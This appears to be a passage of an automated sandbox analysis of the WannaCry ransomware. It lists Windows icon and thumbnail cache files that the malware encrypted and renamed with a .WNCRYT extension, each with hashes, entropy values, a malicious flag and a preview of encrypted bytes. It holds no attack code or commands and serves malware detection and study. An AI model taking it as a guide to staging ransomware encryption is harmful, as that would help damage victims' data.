G.H.:..5)..].~.h{..OjI...B....z...3.q....".`..P.W.......QS...e...Qt..a.'..!.'.?..l@..(.SKG.b...^!......TY t...8......5..T.s.%..F.U<.0.R...M.........Wm..$.....zq.!=...p.....0.~'..Vl....dPP..V..../bT..9..o..P..? r.g.E,......;..W.(..=.E<5..y.........s..W;".W."s..#.).!...].I...lk..C@....6O.S.E....W.....

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	75832
Entropy (8bit):	7.997585036000987
Encrypted:	true
SSDEEP:	1536:Y7w5RqD4w6ZSFEWu7IKCaSWjY/tSPYTfyN1KlxcTaSPus+I+:Y7qWMMFEgKNbjYVyacTazH
MD5:	90F791679CB824980C995EEE2497D212
SHA1:	3EE03606F75414FE499AE43EC2E498554B5E0080
SHA-256:	8801FB423B9052CFD104F7B4813C768EDFCE8537CB47E9704FAC03B3BC47B882
SHA-512:	AEC926F99B4698F48B60FF2BD38626A9B59992A198EFA0B59E9C06E6D5A01A54D8914F5D2D4AFDFBD553A6FD87A88443521D993C51AC161E5CF00E2DC1ECBAF8
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.......Ep>e..<,.. :.. .PG.1'..........W.'.3.z.T.3.&......m.TZ"z..Eq..%...t7Tq.I\|...5..}1...EU.....t_\JV^J1....L.>d9...e@.....D..N....d...E.g......WP...\|.......j..>......."...yfn...&".-.>.oWE.5...(........V...%z....?y./S.l..=4.^...HIA..L......F.4P..p.....'........g.V'..91.....+....L....ASm-.....7.+.6...0.%..9..t..,/....#..Z..'..5...G..#...RO.a4.+7i.......>.....B>.......QN...l..2.F9]L1...R.\.F.74O....^6.T....6T,..s....'.%...Y.mFn.........n.t..)\..j.....Y...2M.+...y..t??..'..>%.P.-..Wo+.................E....5.f...O..r....Z&?#...h.'.R=o.rj...G).L.f..r...?....#<R/v3.......!.$.....z.V}xS.wi.t.7.{..........#..nS.....a.hu!..r..8...aA..e.e.b./\|KD.....9w&.cx%:... 2.2v.. l.dY'....i...~.?.rs..E..O...-U.....L.e...;....;..m.>....=..g..Z.E.%.Fa.......8...J..~.[}}.a.g.9.._pKMo....Y.5....V..[.Cve...T.!.N%...?u.6..[...b.m4...X.H...b7......~....(`.C.f.:3.6P....;.R.bNS<.<p-.n5.viK&.u..,.9..B.@.?..mx.....JP.b.\....`w....u.B...Y._C....mM...Bd..C6,.

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000018.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	86248
Entropy (8bit):	7.99805036289306
Encrypted:	true
SSDEEP:	1536:880nK29J49Cr4gPhBsuJnpLoUdwmJe/Qt5BAeVrE6yZjMDcR8SOeG6QvVfQR7hyr:v0nxRhB3omJe/y+Q7SOeStfkhM3
MD5:	65B0F269ADE6D32F160EC04007B5DE04
SHA1:	02ECFE6B11F25C737EE22964EAC87384A5588694
SHA-256:	6C0E3037C3B1EE0BD65A5C827ADDA7DE0AE337D2F807C3E5A6379F9623C69D4E
SHA-512:	2672B8A31B31A258E583661E94B45D907FBAC93C0F20E390A7AFFDAE142BB23FD1F434DC782A14EA8CEBBF41481663D60A97BE93A106A53B127E6BBEEB41C3C0
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.......u...L....N}.C.`r.....r&.~-.K...iQvQ..x$.7z..d......>...n...`...(S.x.._..+.a.@F1..(.vK....T...../.Ft.Vh\h._c.A<!e...E.\.....r...e...r0.hQ.s....v.CTa..5.5....{:.^.lA.J[..46.k..!..N.P*]..&.=.5..Y.@...".w$....L.-.G..U............5...V............O.........i_..;UC{..\.RS..lo...J.jl........4...Q..5.<FM.$..8......(...aA.....qs^L......E.F.V.p..\|).//..W...Uc.z..u.....:w.....K..a....\."..'.HE.y.1OS...?..x.\._.....0....q..\|.:]M.....>.r..c<B.....9..YkQ..~M.\...}. .....,.z@....2...[..f...x.....A.'..S...K.J..U.=Gh........+;.@6.9.T2."8.\...r.&...8.r..)Pf-..P/.z.u]y.R.:.F../..m..^.$.p...@..y....,...Pd.....{.....g..kN?..o..6..d.C.6}.bx.#..n9.....c.Q.K..o..l% ....."....v....c3.._q.9,..W.?8....k..H..p.u..W...5.~.L..f..../.z..F...e.tQ..j.&+u..C......z1V.5........Yz..zh.n.O.3.m......6}.<...........N...~....z....^Q...B..p...M.r8>C>W ...<.....Z.E.7U]..a...;@_..\|.%\.(.....=.........[.].v....)S..\.;..vN.L.yD.x...\.........q.41..=B.Ht...P...

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	312
Entropy (8bit):	7.1464841680080085
Encrypted:	false
SSDEEP:	6:bkEN2IzLaqlfhkR/6Ig9Y9RXdBhXqmyJkz/tGV+je3zkDvI:bkEvzL3FhkZ6pQRNB0myJko+uks
MD5:	9072F125B54CB39E79C916BEECD66FA0
SHA1:	2CE0DA9D83C607C5D166A424887DEF366855718B
SHA-256:	352872C6D669ADD0821F9AD21060C0BBA6E23E8A957178B661362C72D36ACC9B
SHA-512:	872803BC7D1E146104F239A785739A849980D1793A947AFE824773261D78D0E1B02B2CE7CB86D7EFF61E07FD0DC77310F4BE2C86302AAE9568BEE3E4BB8E6023
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!........0....".0...v....-??..(a....UXy-\|M.U6@9C...q...V.x..D?.0..........#0.=.?[zTg.8\|N.........e..t.lHj..CI-........`.....wj_l......b 8.H....W.=......<mZ..k.f`.!5=.....xA`Q...W.8.`8+..9E..a..O.lyI..d..v..*x.a...P..E.....".q.M.(..S..X-.....&................(/..-$... .Q!9.&~Y.S......L..

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1048856
Entropy (8bit):	7.999837232928066
Encrypted:	true
SSDEEP:	24576:j4zHIv8V0mMOhDJ0HV4qj17SblcTdoQK/j4rLnOdk3uH8T4wiaO5Uf:j4Pump0iwuQKAOYMwCKf
MD5:	F331CF7EC3828D50F85DAAC0F6648F71
SHA1:	4D9185EF12F479542D7CF2414B62C40014BBF1A8
SHA-256:	E2C35C59B686E28885812AD273562187C852A17FC2D5D055AA0475CBDBAE4971
SHA-512:	9AE96589CF74B1789AA2E61352886DB194DCC70B5C177118E818B33D303DCE9157019E8D6C8BE04DECBA6D189DA5B4DDB3721F48DECFC005FCC853676EAFFAC2
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....Vu.a.V.,....{+R....PS......}Dn.`&.tC.!.I+T....)F..~..<..F.X,Q.?.`.......V...`7.s.l.D.mW3.....2..sE........7\.......K../1h3'L...<Y.n ..` .e<..e8..8.R.^..w.{..q.....$XS.......,.kA........k..V..yf..<Y....@.$jR.+..dK#..../.l.xN....A..m.b...l............5........R... A5.Vy......).5...t..u!.c.\............L..6)..`Z.TA.Ap.]\#H.y.._b..$%..'.Oca.#?.....W....Y.y..$C+.%.U......f..2...-......}.."#.R'.~.\|...`{v..Rh`...E.2F.a.S.<#t.e............X6..^6".<....Z./..i.6...V.l........+.hm.....=.....}.....Q.d..{8Q.%.JU...@,12`.{....J.X.@x. D.\|....y'...{'.c......=h..M.xW....k...3.[8~{......~.u..#.D.....N....2.Q.@.~./.)F/....A$_......<N&M.V_...g1E.X....:..5.T!..<...d..e.<..s.0...1.....~.....3\...(...n..k...u{...F.<...n.....d.........F.oX{...c>~].Z~..a....x..-.D..".N..b...N.S72... .i..^._.yM\..=.DZ...O".."....=..T.e.....C.....1a..e. bC..i...IOZ..i....-.`.E...e.x!i;.........,..O..E.~.A.z6..wZ..<.P/...R.9p....D..4e....DumN...EQ$".k+..d..t

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	312
Entropy (8bit):	7.2295989659072974
Encrypted:	false
SSDEEP:	6:bkEp129YvNfnen3FJ0XPeRHEGkdE+jVQ6R8cL+FBqHJrablw67/8a:bkEjpNfnm6XWB9kdE+26R1k0JraBdj
MD5:	C6E2ED065EC1047AD68ABCD09FF558D2
SHA1:	B07423EEB6377E28E1A8E5A228C41FB38F9B34C9
SHA-256:	7676ECB9F327B88A883A6F0A3C462576ED684E54EA40AEC034A74D18D797C6DF
SHA-512:	466C992BF3C59C17386532811F528DF7EC6E84EA73A6561D3C791E1BAC67C1CDCEF1A04F3FB017543D9BAFC56D5FFC5C15AC538B6B67F0158FA1FF7FDED46935
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!...........!.w......Gd.+K.%.9..............&.W.6)...+L.ihS%..h3f..y..17....)^$+....oOT...-/..L.MvW...j...t..a........^.k..:..sZ.\..Q.>....u.d.?.#*.=..i...........so1 ...r.T....t...V....+b..E\|..".n..s?.k.'mC.I..7.t}..S.z...2.\|.29...........L..U,..E....................".<..7...........).34.....

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	5243160
Entropy (8bit):	7.999967562249552
Encrypted:	true
SSDEEP:	98304:33g6FvxI5sGriPPGwGPnfthUXdWMh/IgLP49Zx1p2G3/cVrQxRw+AJMOQnjJc6:33hxIseaGnfVhUXdWyIkP49f1pb3/EQJ
MD5:	946E85F1D5FB2B1C246BB7E0548734BF
SHA1:	26CDEE10A6D5FF39E48E601BA8A74A3350AD3F30
SHA-256:	34E3F4AF82B6E134674B8D8C922D1C77D7A2F4C5E2E5EC2FD9FC9BAD073E323C
SHA-512:	54D43B63221D4EDE1715835BE03DF978A4B04812F0D0D4E8FADBFF596359638AA8771FB61C0DA13EE5533D39F26513F42C3FEF137AD3795534C695DC6519288B
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....].O.\|W.".-D~.?.......D..,c........a~..$...).b..JW!O..$-..~.R.5....Qb.9....C..&z..^..7!.5_.N.......z...a.A.,.x....&M.\...>......8..I....>.j......1}.B.."..&JF"H0...{.(h..!>...u..K5..w.]Q/.-q..T..P...j5K..-#8K..ol.. .uO3...:G."&...6.....-.\.}B.n.w..]..7.......P.....fz....'.}+.......nX..c...L... .......}..T......e1.S.'..k..4.\|f...$.A.'.6..W@..5.p,.......i&rT_%.d.S.[...[.9Y...2........n.$k9_=:.....)8'..)W..>-.I.....!....m..<..U...!..F3J{5F..._(....`..`q`....@..6...e5....tu...{............`...[E.j.k..F....x..T.%&z...b.H.?q..A.d.:`k.T..l...3.7......g.\,...0.aN.Ep.....$..1w....M....M-.-i..J~...r0E.VD..%..J..b..o..A....w....Y..t.H=R(8.7A.f.......t.9.6n.%..:...amg........\....7....D.V.!R..$.....@o..FTL...qkV.u-. ..H....C...S..s...VdF...Z.!....v......?.....FM\|...D.x!..>A<N\.k..J..8.t.....7..%U.D...d&....9R..,:...........[..v.OP.JE....a..UCw=..4..c....D....o..GO.!c.,F.+....=..3^.l...S..\.i..^..0.Qs@l]..s......$g......Us.rK`k?G...w:.J.....

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	312
Entropy (8bit):	7.219889978575754
Encrypted:	false
SSDEEP:	6:bkEZx3IkZ4fVHivY3Eov+IJRG7CJejATEvyHoqFDIqJCc0llQ:bkERZ4fVHnJRG7CZTHoqFDKTQ
MD5:	7FAB3A44AF22CA462A286BA409FBCB4B
SHA1:	CCF5DE1617BC3EA4FDA0A6B1EE7CFCB1B57A8597
SHA-256:	304886F96E9B953A5FC22482539EAA2EC592417670CA01CA4438167E15B08734
SHA-512:	D795AAB2F746153F3288CD51751C7C768C54F6820DFE9224C3994B81A52A235CF854CE50F36A1F4A62541AFBB24B40516C601472285B88B854083A416D8175AB
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.........I5.x.._.....{...X ...F..C.w.8....k.=O.MX.#.}.2x:.....y.Q.d../.....n........s\|..:,K...t$..........nG.7Z............<7....\|.;....%B.e".6.._.c.....U0."..<.....w-...5i..q.",.@....3...+tOi.... ..us1E..,..j@N~..4M+./Q..I.._1.@..)..Y.....(u..\|.@...................s:...1wF.bn.x...J.N.....u

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	2097432
Entropy (8bit):	7.999919437933085
Encrypted:	true
SSDEEP:	49152:KnUUrhuWJyCKP4BevlVCt3PYzf8dRjsnnKMyud05FBdm265b:KVrgslKP6edkt3PwfQInKz4IFh2b
MD5:	AA4E619E173D4CA79B06E4C7B15A3751
SHA1:	6FDD4C38634B193D630F7850CA5C0FF27AE9CF5F
SHA-256:	2EC332886EAD158378ACBE5EB3F129F83C8945BD370DA246CACDBC95CB3E35FF
SHA-512:	948CDFE39281D76C3966A4548F1D43FEDA8C48A1F09C595C1A01751D48BCBC99A84C81CD46FFBBE870F45B2E8FC452728C085A47406579CFB428B38DE61FA73E
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!............$Dxn..ed.,\L. ..3.Q,..AM..X..\`....,_......f.....$.n6H....s8...Z>....s.O[.......S.5.UE...I$..A...7....M...@-g..H...0.....s....f.....).. C........k.)..../......:n-.y..>.......b..hj.#..W......^.L3.x .0v........z...=e....fW'E......x........ .......XW%......i..&La......8...)[..Ox.=..N....N.R.c.n..^'....LK$f.u.....u.}..2.^.x<...%...fmy.3..%er"]!.]...m.x..&..%...."$......p.q.`6..1I..i<%.d8.B.D.K[.T..E6a...Z\..DW/...X.z.Y(.OE.m6...,L..u.......hK..ba.u.../..,..(.....c2.a.3..U......j....n.x/...j f.\.c.c..G5...t&...F9.D.X..g.cp-...A&...2...jH.31.R+.2f......Jl..g....c.@.JCc...D..e4=....2.>Y.Y.:.<.a..K\|.r..W.....A..(T.V...ZV.I..S.i..T...^.`.).H.-.K...=_....YTDC..i.w7$r.r+J1........\.f.8....r8xW.q...5..#.....o%b...<h1.K8.~.y....L"6y.0B\....h0/s.(.6...:df.'....Dn.N...[.A_......a.............NL<.T.p.B...".....v)..lo...,...@..&v..D....L..\|.u....IO.1G.h...X9/7........s.'...".He.../...~\|.i.Xt{./.c9.....T.k:....].,....xXC.J.....[...H

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	4194584
Entropy (8bit):	7.999951338291989
Encrypted:	true
SSDEEP:	98304:MmvMT9vY1cl2DWSRmRvjx8kqMYg5HW7eaJeqtZmjhYDWaUZ:M79vYNWXRvjxXT9W7ea8qtZAhUS
MD5:	209D6093E7D9782C3EDD8D2661A43B0C
SHA1:	A8BE9D0021DB6DFCE2EFDFC898DA9EB10CAE0A33
SHA-256:	62E3FF0ADC94641DED887FC2749468D0E596CD4E7FDFB805E8F9195BD44180F3
SHA-512:	E75C1F3545C4EC38E6F8DF16B5638673A3FA46C053DBC3F9CEB724D2AACDD40CF4C86B2CF08B1FA0D96EE4D383B7D57DB80679402AF446E54E035DF5F6AC634D
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......g..fP.....G]..f......vB..}0.N..h.2.+Z.w4...!.]...E.0d.Pw.........?...K.\.5.J....@...........A.3..&.L..~..b..Ru...u..~...i..X..St8.%.H(P.^.D..M/,.=._&L...KIs.C..fN......>.b...V.....\|.0w...9..z`....5.LE.&H.Z..3A...ve..Fp......:............@.......S.p..4.1....k..T1..B..3Q l...4./X.f..){..!.R..g.....[...fk\.d..HA.....W+...].x..Y.....q..<.0K...[M{..b...N...=..x.\......)I..B.tNG.v...._.B...f..RG..N.h#. ..j.H.r.c{....1H.39..O-$.,'.Q.z.#rz...]......).oE...Z...=....h...PY.@\|Q. ..h.~.....7x_..yb.v``.-.+.>f..g..i...w...No.PYP.`....I........e&y..(.v.D.j.?.&W..a~.;..hJ..O..o..fE.f..H..hbbJ..\|..-...;..nb .8z... .l.cR.qk..!...t%C.P.I.K..d..x...F...8..a......bW.........,.U.D.a...?...w...[u..Ad.>o[...tJ..D3.;.........g8\.7$.".j*4O..&.D..L..... ..........K.......%.....1.+3..W.. .}.FS].'E.E.`.......6.o.,gN...z.7..12.@qk'..=M...It.h.F.8HG.....u..Vu.A2.P2 ..td......8.SX..h)a..E.......'.V....J......Jz...I...Z.s.....H.....a.1...E

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	312
Entropy (8bit):	7.282421308717828
Encrypted:	false
SSDEEP:	6:bkEBzmd/gYwgmrG3C5kIfm+jvIVBEQSeAsO38mAUf9CifUha:bkEsd/zwgmrglS5jvIjEQtAsO/f9Ci8A
MD5:	4884E06D901F172C32F27B135BBD069F
SHA1:	11B52837FA024991150111DD2421C336BB8B9095
SHA-256:	AC24871EFEB21778C6A5805B12DBB2D5F68492F56C255C2E27E363A7A6F98565
SHA-512:	6A9E2636AB5C59AD3D8E4B234EEA426545F49D47E0A4B73DF08D57CA95AFB1277E955B23D3A49D5CA348ED7CE5E22EE261151FCC7D3E6CAFAF324076C829EF94
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!............cp...X........@..P....]<..! f...~+a..\|..m............./V.0..}:SX.y.... 8.....}..ZgIq..a7.....9........X.#&Df.]..0p..m..J.......y6.}..y..'..R.G..M@........L....@>!}..)<.~q.`.\|.\S.w.P.e.,..wPHK.....}..-...j...eS.:.\|1.h.VJ.:..[..V4..2.n..............,.+ja..i`...IW.z.}{F)U&...:....

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	312
Entropy (8bit):	7.20137284218906
Encrypted:	false
SSDEEP:	6:bkE2PdwsMB513JdCf65YVMz/bBnu5Yn6fBVUXl+TXSzxOSJ0COpO:bkEGrC9HCWYe/dv6fAXl+TCESJ0f8
MD5:	B5D00602A039EC6F8177BFC17264FD7D
SHA1:	0552ED604D0A811BB90F218B0D656281371D84A6
SHA-256:	428AD27F2E9CDC70ADB9EB338655D7AE0CC9F5329A97FDB006C6DBACD5600531
SHA-512:	24CA38525EA811B1607D12223D290D07EF912C659DC7A2D1B6B1BB93E4083154F85BDEF36EE0266BC81CC3666105FDE69DCE33F8FD9F1DC7A75CE516D7C8C10C
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....}[..f@._0).......&Z0.........Y.h...N....7..@....V\.M...0......U..\.DKo..wo..e)....Fl..B.\.....L.3...O.~.h..Z..].B 5.}#.8.........}.K...........:...h.............{.`......o.'.....+..b.....M....p....g...`..g.a.....~..........=...fQZ..u..P...................]..C.'..v.w.....f..I./......f.`

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	312
Entropy (8bit):	7.253585964161665
Encrypted:	false
SSDEEP:	6:bkEEAaF76AoGPXMMkR4UOtDZ8c5dojRU14vBSX+ufDTg0nX83aXW+H1Mvf0Q4BYA:bkEEAi15MYUDidqRfSX+ufXE541Mvh43
MD5:	359C2D1183EDCE1462B8852C8C587217
SHA1:	860DFAEA3B89F98CB9E884B2B9D73A81BC733683
SHA-256:	F2BA7A51EB1C700D778D543379DA070B7B4F1CB4A07734EAC91562BC41FC2327
SHA-512:	0FF1ACE17506CB43218E5B0FCA8C969C629635C1B71F5036DCA58B933F745AB794536A775248E34620CCA3A61B55748FC9EDE4F6CE28FD1023E906F9C2F43F0D
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....i.v..8 ...g..9..y.p....j.6aV..kW...?(. ....`7]-....#..kR.48...E.Z..y..+...OL`...f....."...C..2....KD+&.<6Al....3...8....\|.J...-..Q]......3.2......s.......z+Io..C...or....}...e.x$s...._...."..k..(.....Z...Q.o,.j.#b.qT..\|5eS.......8...+..o.J....................~..\............E.q]..L...

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	312
Entropy (8bit):	7.260048071566082
Encrypted:	false
SSDEEP:	6:bkERjw6htqwe5nJVWJ+eVVIh6r2zJETNOCCmYT8zRRJzyY4oCLCj:bkElwcVe5Gf46XNOCChYzRP3j
MD5:	FF2F1D6A0E57916F968F603F68B4C548
SHA1:	D3A6229EB4C87F06E9E0A53E35CF692A6C30E65C
SHA-256:	C9DB33547578FB576BD806BF04058ABA0AEFF1EE12A0E0ECA0CBD8B6A912FACD
SHA-512:	9677E108C9A0071E053D6AE8109DA61A72FD1C3C2DA6F383055E8A6943F2CAECC7C4344ED7ACF5F8AFF5653FC42F00B1CA907F2F89418529CA408F570E67DDAA
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....e..-Y.\|.&W........O.T..%..Q..n<.....z.......r...\.#5...?.A.1.....U.X........l...$.,.....uv..d....)WV...)..s.4..(W.q..Z...y/~.........d.7.&..(V.o:.D...p.8...(O....d.S.v..i~..e..u.....Z...;.T. ^..g...Q...._.o...D.s....a.....E.......m<t.................../P#....k^...f..?..0;Z.

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	116776
Entropy (8bit):	7.998399157123839
Encrypted:	true
SSDEEP:	1536:pytm1VVe5YU7z0KRAQerM+o/bDkgvorg8/s0xQrg+so+7K0w1/NoxGavFsI8cBoD:pyL5P7OrNozEgystg+sVwFBa9sIDXUd
MD5:	D648A1F51DC6EF6C7D18A950FC35C701
SHA1:	3BBB792D808B3467DF9589E87F4FD852D798F856
SHA-256:	DD115B2F54615A06EB7EC0B6A6560577C1D87259B20FD9483035C964F92994BC
SHA-512:	2177C99EFEFDC91FCEF01F221526B975C4002462BF1A998758CCCF49F13EEA9CAFA44C917A1187131EEB0543B705A8E481D4CD01FCBD690E681F4D02C6CE89DD
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....7.....\..%..8`,...N....l'.'(...)..p3;.2.....U.....7....H..+.{.JWO..P=...2..'&..5n.$8.J.....8.......ec...."....Yg..u..%.A..<...........a.b..#.K..]...`..i....A'z..{....\|......;#.4.F_.VT8.H.Y......!...(:...O.......P.(.Fq.nL...Mes.....9L...............3.&$.OHeW>:G.r.I..[y......V.T...;.v...<...3C.b..V...n..{^..^#....#...!^.o:.H1JlB.....0.D..V.5....j.a....RH2.Y.8..k...Eb7....... j\...N6.p..eD.c.7.Wf.HcX.../ Z...P..4..n.~..\|...~5.j%..._U?....6.#,.57$.{.r....iS.....:...Nv m'4. U..7......................C.5{....u!Kh...a}?R.j...1xX..h..?......p....;..j\|.H.....LNr.C:.....W..5.y..O....`...:..@...3... ...a.?....W)....r..p........z3..>.........4V...[t..'6B9...7$..Q.....)...7ve.@.4..N9.o%....1..f....T..X.GG...Dk.8....N.........5..+._..../.7..l....+Q..%...p....Bd.0.;.\|.....{s.-C6.=....\|4........}.\|....@v ....=.Z~I_...L.?...6-....~[GX....>.O^...#t...0h.G9Rd7.&..O....F$-...aG......u..... ..G2...v..... .XA...V.VG\|3.......v]!...6...:..{

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	312
Entropy (8bit):	7.192607115205324
Encrypted:	false
SSDEEP:	6:bkEXMiXP0s/7nPvwsEE/DBEUku4XluqEDnjPH6ms1yAq3pLv:bkEXVznwsEE1DkllEDnzax1yAC5
MD5:	D5B75A5AABC1284939CC45042E43F087
SHA1:	1FA832B480477B988DAAFE4036B9B1D4D4C67F5A
SHA-256:	2DB8330DFB5EAA794A6172F7BD59C20251EF65DC2BC562AA26675CDB7E0A207B
SHA-512:	8E19B7D175FD38DCE9AC23D77E27AA86237585D4379724BC3423A2F558CAB703764311C3F8E26C9BB5FFA76931625ED4E5EF0E9572B5ED8C0A838F071CF237DB
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....mgQ..r1.Wg...!.oPI..M.LD.Z.R.<.s.R.g..~..Y.+.)9..'E..q.~.s-D..:X...sn.Y....we..+..I.yh....A..U.Y.u.1....q)M.KnG.E.K&..k..jM.........@..4;.,.\I..^.xk..P4..y......u....OI...FM..a....p...sU.../..<n5u. _b.T.T...u...gj.3.d!..BPW.e.u..A"..i.KqSdse...h............>.<.x.e.0..z.......k..m1U...}...

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	312
Entropy (8bit):	7.208268767086614
Encrypted:	false
SSDEEP:	6:bkEXS1W225k7oKDBlYkpje4SN3Phld4O6mjSyrS4bVefGtQKq4C8kAdTl/dyV:bkEXS1poKDzi4SN3WONrrS4bLcA5lm
MD5:	1DF9D168FF5A6368A14F91C6057DA11D
SHA1:	C077A21BBAEE0654BE4461FE2E517072E6E445A5
SHA-256:	63E6912BCB79C9A7FE494FD74617A2097E8568C0A8086B7E64B944035D36E5ED
SHA-512:	C8CC544E0DBB5D4C881446C766FAB73556B8873F3CA8A4DC399C3282458942832BF15B4577B02F066F9F9E2EF512599EE02958D1802667A10A5121D808CFB45C
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....%7I.../.z.D...3Y...Z.FX-f.....[.2.K.QY.4....$.....:l.d.........(#..8. j%.....\|_..M....,.-F..r.A.k..8...5....,.r.y ...7.p.?..j.......g...sb...C...d.o..y.,..8.>.).[H.e......@..C.U..n...\|..n...#..ciEq..\.T..).`...c..h..x.]G.qU....n....).&........H............'...d...cF..E...q.........f...

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	312
Entropy (8bit):	7.274833898656102
Encrypted:	false
SSDEEP:	6:bkEzAG9FayqsvRk0rFiiwhc+JtCc48ejfrWdOIX6P+3qwVbZeeA6BKz:bkEzp9U85k0ATK+7sKdOIS6tP4
MD5:	677205BF4453C5BADD1DD42261E366E9
SHA1:	09CECB2D9D22D4F1D0C30CDD515D757DA82BE124
SHA-256:	A211BD0BCC9140F7F455A8F2A289EF789444845A1E86B621A592F8D439D0E22D
SHA-512:	2781D7FFDE62C9438372BEDB548EDFF906D590166FC35AF2AF308815DD81F17519FCF2BC70364B2C25E85123F550DD40073E9CAD639F93C7E4A983FFECEE93A4
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....~.<.^...9R.Ai..P..+..:....E..%.B.."...&..."a8&H..N.gLC8_1....j.s....p.B.f.)...."....>~F9....:..f.-.B............~@.X...J.t..!u.KqP6.....&\|l...0.0.Wg.s5.[......=...e-.v.p...c..`.,V..<,N<..<.... ..8.>u........m!".2.....<#M.d..<.+fyETn......)zo<.Re.............nr..`.....D\.v(E.s........`#.q.

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	312
Entropy (8bit):	7.20046444827832
Encrypted:	false
SSDEEP:	6:bkETZhWo1WlN+RaN7GePNh6MPiCnNmGHIAEpVkY91w7vAwI/OwuAO5uto:bkETZhW+WGRaprwC4GwPkY7w7vPjAOx
MD5:	C2403E25489BCBA571300D3FD3E5CE91
SHA1:	3F5B453BE5CB8779325676091835905EFCE46FE2
SHA-256:	6219CFFA9914CB0DB02B058B619428064D640C55BEB3A4050B65D02659A47248
SHA-512:	42A349D66B0796851633643769ED13FD823379BE741C971E984CCBC27C33DA9FC7A8D1870D878012580645124C9E24A84C3C2A6709DD173A03BCDEB70CE52967
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......g=....s......;.7.s.nyt.:...W*.....$f.wt.c6......p.dL....D.h..O.K.U.=..Uny.dX..N...}.j..y..)..(F...'..W..0...B%..._s..1.&.,_..hw3...9B-.....z..f.`.3.._.&W.C.G.]...6..Q...et.......n.m.+..W^...\42.&-.&.......iG\....Pd.$..O.etMT...e...Z.L.............................p...}.M.J.$..H.

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1048856
Entropy (8bit):	7.999829506965946
Encrypted:	true
SSDEEP:	24576:QgIDkQSi7RYmIKKp4rGggs8hiUpabs5cv5XZHhezbDOq:QTJ7fM4rQslmos5cR50J
MD5:	577A754C45D7E4F20D2D3EE5293FD0F0
SHA1:	568754B9C5165EA4502864D572931404E8C60947
